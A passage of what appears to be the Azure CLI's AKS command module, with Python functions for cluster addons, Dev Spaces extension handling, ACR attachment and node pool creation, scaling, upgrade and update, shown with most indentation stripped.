# *-ing state
print(f"{colorama.Fore.BLUE}command is in : {commandResult.provisioning_state} state{colorama.Style.RESET_ALL}")
return None
def _get_command_context(command_files):
if not command_files:
return ""
filesToAttach = {}
    # '.' means attach the current folder; it cannot be combined with other files (at least for now).
if len(command_files) == 1 and command_files[0] == ".":
# current folder
cwd = os.getcwd()
for filefolder, _, files in os.walk(cwd):
for file in files:
# retain folder structure
rel = os.path.relpath(filefolder, cwd)
filesToAttach[os.path.join(
filefolder, file)] = os.path.join(rel, file)
else:
for file in command_files:
if file == ".":
raise ValidationError(
". is used to attach current folder, not expecting other attachements.")
if os.path.isfile(file):
# for individual attached file, flatten them to same folder
filesToAttach[file] = os.path.basename(file)
else:
raise ValidationError(
f"{file} is not valid file, or not accessable.")
if len(filesToAttach) < 1:
logger.debug("no files to attach!")
return ""
zipStream = io.BytesIO()
zipFile = zipfile.ZipFile(zipStream, "w")
for _, (osfile, zipEntry) in enumerate(filesToAttach.items()):
zipFile.write(osfile, zipEntry)
    # zipFile.printdir()  # uncomment to debug
zipFile.close()
return str(base64.encodebytes(zipStream.getbuffer()), "utf-8")
def _get_dataplane_aad_token(cli_ctx, serverAppId):
# this function is mostly copied from keyvault cli
return Profile(cli_ctx=cli_ctx).get_raw_token(resource=serverAppId)[0][2].get('accessToken')
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None,
endpoint_type='Public', prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an \
interactive selection experience.
:type space_name: String
    :param endpoint_type: The endpoint type to be used for an Azure Dev Spaces controller. \
See https://aka.ms/azds-networking for more information.
:type endpoint_type: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(
DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(
name, resource_group_name, update, space_name, endpoint_type, prompt)
except TypeError:
raise CLIError(
"Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
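# Illustrative CLI invocation (assumed example; flag names may differ between CLI versions):
#   az aks use-dev-spaces -g my-rg -n my-cluster --space dev/my-space --yes
# This installs or updates the dev-spaces extension on demand and then delegates to
# azext_dev_spaces.custom.ads_use_dev_spaces.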
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(
DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(
name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
return sdk_no_wait(no_wait, client.begin_rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
no_wait=False):
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(
addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == CONST_MONITORING_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring" '
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {
CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id}
addon_profile.config[CONST_MONITORING_USING_AAD_MSI_AUTH] = enable_msi_auth_for_monitoring
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError(
'The aci-connector addon requires setting a subnet name.')
addon_profile.config = {
CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise ValidationError('The confcom addon is already enabled for this managed cluster.',
recommendation='To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
if addon_profile.enabled:
raise AzureInternalError(
'The open-service-mesh addon is already enabled for this managed '
'cluster.\n To change open-service-mesh configuration, run '
'"az aks disable-addons -a open-service-mesh -n {} -g {}" '
'before enabling it again.'
.format(name, resource_group_name))
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
elif addon == CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME:
if addon_profile.enabled:
raise ArgumentUsageError(
'The azure-keyvault-secrets-provider addon is already enabled for this managed cluster.\n'
'To change azure-keyvault-secrets-provider configuration, run '
f'"az aks disable-addons -a azure-keyvault-secrets-provider -n {name} -g {resource_group_name}" ' # pylint: disable=line-too-long
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if disable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "false"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(
enabled=False)
else:
raise CLIError(
"The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
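# Illustrative CLI flows that funnel into _update_addons (assumed examples):
#   az aks enable-addons -a monitoring -n my-cluster -g my-rg --workspace-resource-id <workspace-id>
#   az aks disable-addons -a monitoring -n my-cluster -g my-rg
# The function merges the requested addon profiles into the existing managed cluster
# object and nulls out the SP/AAD profiles before the cluster is PUT back.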
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
aci_subnet_name=None,
vnet_subnet_id=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
rotation_poll_interval=None,):
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True, config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id,
CONST_MONITORING_USING_AAD_MSI_AUTH: enable_msi_auth_for_monitoring})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError(
'"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('azure-policy')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError(
'"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
if 'open-service-mesh' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = addon_profile
addons.remove('open-service-mesh')
if 'azure-keyvault-secrets-provider' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"}
)
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addons.remove('azure-keyvault-secrets-provider')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
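# Illustrative create-time usage parsed by _handle_addons_args (assumed example):
#   az aks create -n my-cluster -g my-rg --enable-addons monitoring,azure-policy
# Any addon name not handled above is reported back through the CLIError raised at the end.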
def _install_dev_spaces_extension(cmd, extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(cmd=cmd, extension_name=extension_name)
except Exception: # nopa pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(cmd, extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.core.extension import operations
operations.update_extension(cmd=cmd, extension_name=extension_name)
operations.reload_extension(extension_name=extension_name)
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error(
"Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
from azure.cli.core.extension import (
ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(cmd, extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(cmd, extension_name)
return True
def _ensure_container_insights_for_monitoring(cmd, addon):
# Workaround for this addon key which has been seen lowercased in the wild.
for key in list(addon.config):
if (key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and
key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID):
addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(
key)
workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID]
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError(
'Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(
workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(
unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_acr(cmd,
assignee,
acr_name_or_id,
subscription_id,
detach=False,
is_service_principal=True):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(
cmd.cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(
parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(
cmd, assignee, registry.id, detach, is_service_principal)
return
# Check if the ACR exists by name across all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(
cmd.cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError(
"ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cmd, assignee, registry.id, detach, is_service_principal)
return
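# Illustrative callers (assumed examples): `az aks create --attach-acr myregistry` and
# `az aks update --attach-acr/--detach-acr myregistry` both end up in _ensure_aks_acr,
# which resolves the registry by resource ID or by name across resource groups and then
# adds or removes the AcrPull role assignment for the cluster identity.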
def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name,
kubernetes_version=None,
zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
ppg=None,
max_pods=0,
os_type=None,
os_sku=None,
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
scale_down_mode=CONST_SCALE_DOWN_MODE_DELETE,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
tags=None,
labels=None,
max_surge=None,
mode="User",
enable_encryption_at_host=False,
enable_ultra_ssd=False,
enable_fips_image=False,
snapshot_id=None,
no_wait=False,
aks_custom_headers=None):
AgentPool = cmd.get_models('AgentPool',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='agent_pools')
AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='agent_pools')
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
creationData = None
# load model CreationData
from azure.cli.command_modules.acs.decorator import AKSModels
CreationData = AKSModels(cmd, ResourceType.MGMT_CONTAINERSERVICE).CreationData
if snapshot_id:
snapshot = get_snapshot_by_snapshot_id(cmd.cli_ctx, snapshot_id)
if not kubernetes_version:
kubernetes_version = snapshot.kubernetes_version
if not os_type:
os_type = snapshot.os_type
if not os_sku:
os_sku = snapshot.os_sku
if not node_vm_size:
node_vm_size = snapshot.vm_size
creationData = CreationData(
source_resource_id=snapshot_id
)
if not os_type:
os_type = "Linux"
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type.lower() == "windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
os_sku=os_sku,
vnet_subnet_id=vnet_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=zones,
scale_set_priority=priority,
scale_down_mode=scale_down_mode,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
node_taints=taints_array,
upgrade_settings=upgradeSettings,
enable_encryption_at_host=enable_encryption_at_host,
enable_ultra_ssd=enable_ultra_ssd,
mode=mode,
enable_fips=enable_fips_image,
creation_data=creationData
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
# custom headers
aks_custom_headers = extract_comma_separated_string(
aks_custom_headers,
enable_strip=True,
extract_kv=True,
default_value={},
allow_appending_values_to_same_key=True,
)
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
agent_pool,
headers=aks_custom_headers,
)
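# Illustrative CLI usage (assumed example; check `az aks nodepool add --help` for exact flags):
#   az aks nodepool add -g my-rg --cluster-name my-cluster -n spotpool \
#       --priority Spot --eviction-policy Delete --spot-max-price -1 \
#       --node-count 3 --enable-cluster-autoscaler --min-count 1 --max-count 5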
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError(
"The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
)
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
nodepool_name,
kubernetes_version='',
node_image_only=False,
max_surge=None,
no_wait=False,
aks_custom_headers=None,
snapshot_id=None):
AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings', operation_group='agent_pools')
if kubernetes_version != '' and node_image_only:
raise CLIError(
'Conflicting flags. Upgrading the Kubernetes version will also '
'upgrade node image version. If you only want to upgrade the '
'node image version, please use the "--node-image-only" option.'
)
# Note: we exclude this option because node image upgrade can't accept nodepool put fields like max surge
if max_surge and node_image_only:
raise MutuallyExclusiveArgumentError(
'Conflicting flags. Unable to specify max-surge with node-image-only. '
'If you want to use max-surge with a node image upgrade, please first '
'update max-surge using "az aks nodepool update --max-surge".'
)
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name,
snapshot_id)
# load model CreationData
from azure.cli.command_modules.acs.decorator import AKSModels
CreationData = AKSModels(cmd, ResourceType.MGMT_CONTAINERSERVICE).CreationData
creationData = None
if snapshot_id:
snapshot = get_snapshot_by_snapshot_id(cmd.cli_ctx, snapshot_id)
if not kubernetes_version and not node_image_only:
kubernetes_version = snapshot.kubernetes_version
creationData = CreationData(
source_resource_id=snapshot_id
)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
instance.creation_data = creationData
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
# custom headers
aks_custom_headers = extract_comma_separated_string(
aks_custom_headers,
enable_strip=True,
extract_kv=True,
default_value={},
allow_appending_values_to_same_key=True,
)
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
headers=aks_custom_headers,
)
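# Illustrative usages (assumed examples):
#   az aks nodepool upgrade -g my-rg --cluster-name my-cluster -n np1 --kubernetes-version 1.24.9
#   az aks nodepool upgrade -g my-rg --cluster-name my-cluster -n np1 --node-image-only
# As enforced above, --node-image-only cannot be combined with --kubernetes-version or --max-surge.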
# pylint: disable=too-many-boolean-expressions
def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
scale_down_mode=None,
min_count=None, max_count=None,
tags=None,
max_surge=None,
mode=None,
labels=None,
node_taints=None,
no_wait=False,
aks_custom_headers=None):
AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='agent_pools')
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
if update_autoscaler > 1:
raise CLIError('Please specify one of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler"')
if (update_autoscaler == 0 and not tags and not scale_down_mode and not mode and not max_surge and
labels is None and node_taints is None):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge" or "--scale-down-mode or '
'"--labels"or "--node-taints"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable the cluster autoscaler with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning(
'Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if scale_down_mode is not None:
instance.scale_down_mode = scale_down_mode
if mode is not None:
instance.mode = mode
if labels is not None:
instance.node_labels = labels
if node_taints is not None:
taints_array = []
if node_taints != '':
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise InvalidArgumentValueError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
instance.node_taints = taints_array
# custom headers
aks_custom_headers = extract_comma_separated_string(
aks_custom_headers,
enable_strip=True,
extract_kv=True,
default_value={},
